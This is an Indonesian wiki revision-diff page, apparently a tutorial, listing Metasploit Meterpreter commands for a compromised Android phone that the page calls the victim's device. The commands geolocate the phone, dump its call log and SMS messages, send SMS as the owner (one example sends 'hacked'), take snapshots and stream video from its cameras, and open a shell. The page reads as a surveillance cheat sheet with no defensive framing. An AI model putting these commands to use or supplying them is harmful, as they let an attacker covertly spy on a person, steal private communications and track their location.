Difference between revisions of "MSF: Beberapa Perintah attack android setelah tersambung"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with " Beberapa perintah menarik setelah android berhasil di hubungi dari Kali Linux sysinfo - informasi tentang device ps - linux / android ps command webcam_list - list webcam...") |
Onnowpurbo (talk | contribs) |
||
| Line 1: | Line 1: | ||
| + | Beberapa perintah menarik | ||
| − | + | check_root | |
| + | cek apakah smartphone korban di root | ||
| − | sysinfo | + | sysinfo |
| − | + | informasi tentang device | |
| − | webcam_list | + | |
| − | webcam_snap | + | wlan_geolocate |
| − | shell | + | tampikan lokasi smartphone di Google maps |
| + | |||
| + | dump_calllog | ||
| + | download call log di file txt. ini akan tersimpan di | ||
| + | /root/calllog_dump.txt | ||
| + | |||
| + | dump_sms | ||
| + | download SMS disimpan di txt file | ||
| + | |||
| + | send_sms -d “nomor tujuan” -t “berita yang ingin dikirim” | ||
| + | send_sms -d 9599***847 -t hacked | ||
| + | kirim SMS | ||
| + | |||
| + | webcam_list | ||
| + | tampilan daftar semua webcam yang ada di smartphone korban | ||
| + | |||
| + | webcam_snap 2 | ||
| + | pilih webcam 2 | ||
| + | |||
| + | webcam_stream | ||
| + | streaming dari webcam | ||
| + | |||
| + | shell | ||
| + | kalau membutuhkan shell (untuk device yang sudah di root) | ||
| + | |||
| + | ps | ||
| + | linux / android ps command | ||
Revision as of 06:02, 1 June 2017
Beberapa perintah menarik
check_root
cek apakah smartphone korban di root
sysinfo
informasi tentang device
wlan_geolocate
tampikan lokasi smartphone di Google maps
dump_calllog
download call log di file txt. ini akan tersimpan di
/root/calllog_dump.txt
dump_sms
download SMS disimpan di txt file
send_sms -d “nomor tujuan” -t “berita yang ingin dikirim”
send_sms -d 9599***847 -t hacked
kirim SMS
webcam_list
tampilan daftar semua webcam yang ada di smartphone korban
webcam_snap 2 pilih webcam 2
webcam_stream streaming dari webcam
shell kalau membutuhkan shell (untuk device yang sudah di root)
ps linux / android ps command